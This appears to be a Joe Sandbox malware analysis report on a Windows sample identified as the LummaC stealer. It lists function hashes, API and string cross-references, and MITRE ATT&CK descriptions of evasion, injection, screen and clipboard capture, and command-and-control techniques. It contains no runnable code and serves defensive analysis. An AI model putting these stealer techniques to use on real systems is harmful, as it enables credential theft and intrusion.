Opcode ID: 3b5c94a59830c8984320369a30aa81f50d05ceb39ec7c75d45c57eb7b34a8acf
Instruction ID: cc1466f5eae9f302c89251d1cf7f0fb4adaf70aa56c81c911eccc647cb56e66a
Opcode Fuzzy Hash: 3b5c94a59830c8984320369a30aa81f50d05ceb39ec7c75d45c57eb7b34a8acf
Instruction Fuzzy Hash: 55112874600B01CFD328CF19C5E0726F7B2BB89355F64495CC6C747A59CB36A842CB44

Function 02FBF592 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed4a00db06284ee7861a4d0624cde4ac299109ebe510e6e5beb5ba5a78e3f37
Instruction ID: c15acf681a5776c3c3871ed3ce30261ccf9174cd2ef8938ec3614545e6f3eb55
Opcode Fuzzy Hash: 7ed4a00db06284ee7861a4d0624cde4ac299109ebe510e6e5beb5ba5a78e3f37
Instruction Fuzzy Hash: 07110475601B048BD339CE2AC490A66B7B2BF85358F945A1CD99347F91C774B8068B50

Function 02FA35E0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952976aa7f7c4ae3ce5f28d2878cd52c9b9d0c495e24414eb0676530a0bf82f2
Instruction ID: d22fbecad94a6a9c398e54c46f7d70aa946d7690dfca9bb4ea6d354096365f08
Opcode Fuzzy Hash: 952976aa7f7c4ae3ce5f28d2878cd52c9b9d0c495e24414eb0676530a0bf82f2
Instruction Fuzzy Hash: 15F0F677F6925A0BE710DDBDECD0A66F297D7C558CB0E8038E681D3301E575E40586A0

Function 02FB3240 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb049963e7843b37a80c530777fa79ce0ba6df04e7244a6eaebb70795c1a8cd
Instruction ID: 2c97a3a29404fc103b54092d15b8f05b6d0f1a5ca00aec1336dc45ca3c8e7954
Opcode Fuzzy Hash: 8bb049963e7843b37a80c530777fa79ce0ba6df04e7244a6eaebb70795c1a8cd
Instruction Fuzzy Hash: 61F0ECB1E4825067DB2389959CC4F77BB9CCF87294F191459E94557101D1615844C3E5

Function 02FCF5B0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 1f7819f757de9201992f9be3aa5548c912adff15fbbd6f299b8948a1051b24b6
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: CFD0A52190832246DB748D199500577F7F1EAC7651F55595FF782D3244D730D841C269

Function 02FB49C3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d474268a2614a0d6f6eec6484532c05683eeeca2e19d71fb89469e7e795d3860
Instruction ID: a9c270f4abea52a21cc15b85d04715159645a5fd09f2ac9c760183d6e16ade02
Opcode Fuzzy Hash: d474268a2614a0d6f6eec6484532c05683eeeca2e19d71fb89469e7e795d3860
Instruction Fuzzy Hash: EFB092E9D42410A698913A207C214BAF02719132C8F042030C90723201A6AAD22A589F

Function 02FC7C4B Relevance: 47.4, APIs: 1, Strings: 26, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02FC7D2C

Strings

j, xrefs: 02FC7E0A
b, xrefs: 02FC7E32
I, xrefs: 02FC7C82
H, xrefs: 02FC7C8A
{, xrefs: 02FC7E62
5, xrefs: 02FC7DB0
#, xrefs: 02FC7C6A
#, xrefs: 02FC7DEC
T, xrefs: 02FC7E52
i, xrefs: 02FC7E42
~, xrefs: 02FC7E82
K, xrefs: 02FC7C72
o, xrefs: 02FC7E14
_, xrefs: 02FC7E00
U, xrefs: 02FC7C62
2, xrefs: 02FC7DF6
o, xrefs: 02FC7E1E
1, xrefs: 02FC7DBA
&, xrefs: 02FC7DA6
0, xrefs: 02FC7F5A
K, xrefs: 02FC7E72
N, xrefs: 02FC7E28
?, xrefs: 02FC7C5A
O, xrefs: 02FC7C92
6, xrefs: 02FC7C7A
., xrefs: 02FC7D74

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: #$#$&$.$0$1$2$5$6$?$H$I$K$K$N$O$T$U$_$b$i$j$o$o${$~
API String ID: 2525500382-4136678625
Opcode ID: 39dfbbcddf396a47dd2c621d0dc96cc64ad846197261ac6ae61473857dd429b5
Instruction ID: 55f0da2b05695687f6e49e6fbcaeac1bac45f400b35d5239a052434307d1b706
Opcode Fuzzy Hash: 39dfbbcddf396a47dd2c621d0dc96cc64ad846197261ac6ae61473857dd429b5
Instruction Fuzzy Hash: 6C91C76050C7C28ED332CA7C844874AFFD15BA6224F184B9DE5E94B3E2C7B58446CB67

Function 02FC7909 Relevance: 47.4, APIs: 1, Strings: 26, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02FC79E4

Strings

T, xrefs: 02FC7B0A
~, xrefs: 02FC7B3A
1, xrefs: 02FC7A72
I, xrefs: 02FC793C
{, xrefs: 02FC7B1A
K, xrefs: 02FC792C
i, xrefs: 02FC7AFA
., xrefs: 02FC7A2C
2, xrefs: 02FC7AAE
j, xrefs: 02FC7AC2
O, xrefs: 02FC794C
o, xrefs: 02FC7ACC
?, xrefs: 02FC7914
6, xrefs: 02FC7934
b, xrefs: 02FC7AEA
&, xrefs: 02FC7A5E
#, xrefs: 02FC7924
N, xrefs: 02FC7AE0
_, xrefs: 02FC7AB8
H, xrefs: 02FC7944
#, xrefs: 02FC7AA4
0, xrefs: 02FC7C19
K, xrefs: 02FC7B2A
o, xrefs: 02FC7AD6
5, xrefs: 02FC7A68
U, xrefs: 02FC791C

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: #$#$&$.$0$1$2$5$6$?$H$I$K$K$N$O$T$U$_$b$i$j$o$o${$~
API String ID: 2525500382-4136678625
Opcode ID: ca994f1815b791557b2be75a4c429075f14a05518d41059ff3e67b5f8b3d0e7c
Instruction ID: b3eb3756e9e6e2c973b4e10bea9072d4b87a01ad018113882b7f2f21dede8030
Opcode Fuzzy Hash: ca994f1815b791557b2be75a4c429075f14a05518d41059ff3e67b5f8b3d0e7c
Instruction Fuzzy Hash: 4F91952050CBC18ED332CA7C844874AFFD16BA6224F184B9DE5E94B3E6C7B58546CB67

Function 02FC6BCD Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 172memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02FC6CA8

Strings

I, xrefs: 02FC6DC7
0, xrefs: 02FC6F09
7, xrefs: 02FC6D59
O, xrefs: 02FC6DDB
D, xrefs: 02FC6DD1
X, xrefs: 02FC6E03
A, xrefs: 02FC6DEF
Y, xrefs: 02FC6DF9
F, xrefs: 02FC6DBD
H, xrefs: 02FC6DA9
>, xrefs: 02FC6D63
J, xrefs: 02FC6D95
], xrefs: 02FC6E23

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: 0$7$>$A$D$F$H$I$J$O$X$Y$]
API String ID: 2525500382-3738263051
Opcode ID: c22cd48aeacd73af1f649de5196d90d665897577616198c07976de8e0e933663
Instruction ID: 38a9b85e71bd0384bc034066b065046568b438192317dbe265fe7fc70883eb7d
Opcode Fuzzy Hash: c22cd48aeacd73af1f649de5196d90d665897577616198c07976de8e0e933663
Instruction Fuzzy Hash: 9FA1936150CBC28AC336C63C994868EFFD15BE7224F584B9DE1F84A3E2D7658506CB63

Function 02FC5FB2 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02FC608D

Strings

0, xrefs: 02FC62E7
7, xrefs: 02FC613E
], xrefs: 02FC6208
>, xrefs: 02FC6148
X, xrefs: 02FC61E8
J, xrefs: 02FC617A
H, xrefs: 02FC618E
Y, xrefs: 02FC61DE
I, xrefs: 02FC61AC
A, xrefs: 02FC61D4
O, xrefs: 02FC61C0
F, xrefs: 02FC61A2
D, xrefs: 02FC61B6

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: 0$7$>$A$D$F$H$I$J$O$X$Y$]
API String ID: 2525500382-3738263051
Opcode ID: 330d0e9c55fb4526b0aa42034968226786a41ac7914da0ba23db9bbebf633481
Instruction ID: cca01d7416fba792f78b20cfe81e6b0a4fad8e9cdfd15eff4f0e9b629a0c1624
Opcode Fuzzy Hash: 330d0e9c55fb4526b0aa42034968226786a41ac7914da0ba23db9bbebf633481
Instruction Fuzzy Hash: 37A1A46150CBC28AD336C63C994868EFFD15BE7224F184B9DE2F44A3E2D7658506CB63

Function 02FC7171 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 95COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02FC717B
VariantInit.OLEAUT32 ref: 02FC718E

Strings

G, xrefs: 02FC71E1
8, xrefs: 02FC7279
C, xrefs: 02FC71C1
%, xrefs: 02FC7229
M, xrefs: 02FC71B1
', xrefs: 02FC7269
E, xrefs: 02FC71F1
/, xrefs: 02FC7239
A, xrefs: 02FC71D1
,, xrefs: 02FC7209
(, xrefs: 02FC71F9

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: %$'$($,$/$8$A$C$E$G$M
API String ID: 2610073882-315746412
Opcode ID: e16e82b2a54f8fd8928d0fa90443f6322b001e3fd56380476fac81fc58ac1d23
Instruction ID: 265bffe87cedcd1030108c090c47e3bdb1d93233b2098604621538747dafe971
Opcode Fuzzy Hash: e16e82b2a54f8fd8928d0fa90443f6322b001e3fd56380476fac81fc58ac1d23
Instruction Fuzzy Hash: B851C07160D7C28EE3369B2894987DBBAE1ABA6324F084A9CD5D94B2D2C7740105CB53

Function 02FC52CD Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 77COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 02FC52D7

Strings

9, xrefs: 02FC5361
?, xrefs: 02FC5371
C, xrefs: 02FC5311
;, xrefs: 02FC5351
>, xrefs: 02FC5369
G, xrefs: 02FC5331
E, xrefs: 02FC5341
M, xrefs: 02FC5301
A, xrefs: 02FC5321

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: 9$;$>$?$A$C$E$G$M
API String ID: 1927566239-3786080043
Opcode ID: 96575a094052607204a24d69fa909c00ef49b5aeb0b02dfa48354f2f55b33040
Instruction ID: dd6fb08cfc4ab97b172285de1ff9abe22111f19bb0be1136cb5957986156d931
Opcode Fuzzy Hash: 96575a094052607204a24d69fa909c00ef49b5aeb0b02dfa48354f2f55b33040
Instruction Fuzzy Hash: EF41FE7010C3C18AD336DB28C4987DFBBE2AB9A354F084A9DD8D987382C7B59645CB53

Function 02FC5517 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 87COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02FC5521
VariantInit.OLEAUT32 ref: 02FC5534

Strings

n, xrefs: 02FC55AF
f, xrefs: 02FC555F
|, xrefs: 02FC55DF
o, xrefs: 02FC556F
h, xrefs: 02FC557F
l, xrefs: 02FC559F

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: f$h$l$n$o$|
API String ID: 2610073882-1031717237
Opcode ID: d7b9299920a2aed17ac1e6c6528745d62a49a0568f2341a5477a7f46e56ce8bf
Instruction ID: 380c8e77f1a7cae8470506d4baa5e08e1d890a9a682bd1caaf7f474be8313381
Opcode Fuzzy Hash: d7b9299920a2aed17ac1e6c6528745d62a49a0568f2341a5477a7f46e56ce8bf
Instruction Fuzzy Hash: 3541E53014D7C18AE336DB288558BDEBBE1BB96324F184B9DD5E94B2D2D7718005CB53

Function 02FC5742 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 196COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 02FC574C

Strings

?, xrefs: 02FC5860
:, xrefs: 02FC5850
3, xrefs: 02FC5868
6, xrefs: 02FC5858
/, xrefs: 02FC5848

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: String
String ID: /$3$6$:$?
API String ID: 2568140703-2894599181
Opcode ID: 628ca02c0eaae78a012bb0be501424b8a68603df75cb98bd762fc16e393ec78d
Instruction ID: 860f48b7b9f333ff7760c500249fb0b6e37ffe5d2f63161ba841b36c516410d8
Opcode Fuzzy Hash: 628ca02c0eaae78a012bb0be501424b8a68603df75cb98bd762fc16e393ec78d
Instruction Fuzzy Hash: 4B81197160D3818FC339CB28C45439ABBE2AFC9364F298A2DD59D97391DB34A542CB46

Function 02FC87B2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02FC87BC
VariantInit.OLEAUT32 ref: 02FC87CF

Strings

B, xrefs: 02FC8830
m, xrefs: 02FC8853
l, xrefs: 02FC8858
o, xrefs: 02FC885D

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: B$l$m$o
API String ID: 2610073882-3451755319
Opcode ID: ed27143988ab92166a21383231828f49db020470379976768f0cb2dd00778dab
Instruction ID: c9123ca0958c7137814ccc0a84a152e9b692a1a7d1428378cbef1117008589a9
Opcode Fuzzy Hash: ed27143988ab92166a21383231828f49db020470379976768f0cb2dd00778dab
Instruction Fuzzy Hash: 4A41073110C7C28AD365DB28848879FBFE2ABD6328F484A9CE4D90B3D2C7759549CB57

Function 02FC76A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02FC76BB
VariantInit.OLEAUT32 ref: 02FC76CE

Strings

l, xrefs: 02FC7757
B, xrefs: 02FC772F
m, xrefs: 02FC7752
o, xrefs: 02FC775C

Memory Dump Source

Source File: 00000004.00000002.2658597275.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa0000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: B$l$m$o
API String ID: 2610073882-3451755319
Opcode ID: cef4abbefc51dc265c86347a607e3a64667ffbb8d72f16ad4c9664dc2aa36411
Instruction ID: e6206948130f5d233e49572a6c13ca07379368b05d964ee9a8793d8181adefbb
Opcode Fuzzy Hash: cef4abbefc51dc265c86347a607e3a64667ffbb8d72f16ad4c9664dc2aa36411
Instruction Fuzzy Hash: D341243110C3C18AD365DB28C48879ABFE2ABD6328F484A9CE5D84B392C7758545CB93

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Function 02FCD120 Relevance: 30.4, Strings: 24, Instructions: 443
COMMON

Function 02FAA380 Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 570
libraryCOMMON

Function 02FD21B0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 290
libraryCOMMON

Function 02FACC60 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 364
COMMON

Function 02FAAB40 Relevance: 6.7, Strings: 5, Instructions: 441
COMMON

Function 02FD2610 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 02FA9110 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151
synchronizationCOMMON

Function 02FD23D9 Relevance: 3.2, APIs: 2, Instructions: 150
libraryCOMMON

Function 02FD0E52 Relevance: 1.6, APIs: 1, Instructions: 60
memoryCOMMON

Function 02FD0DF9 Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Function 02FCB4F5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON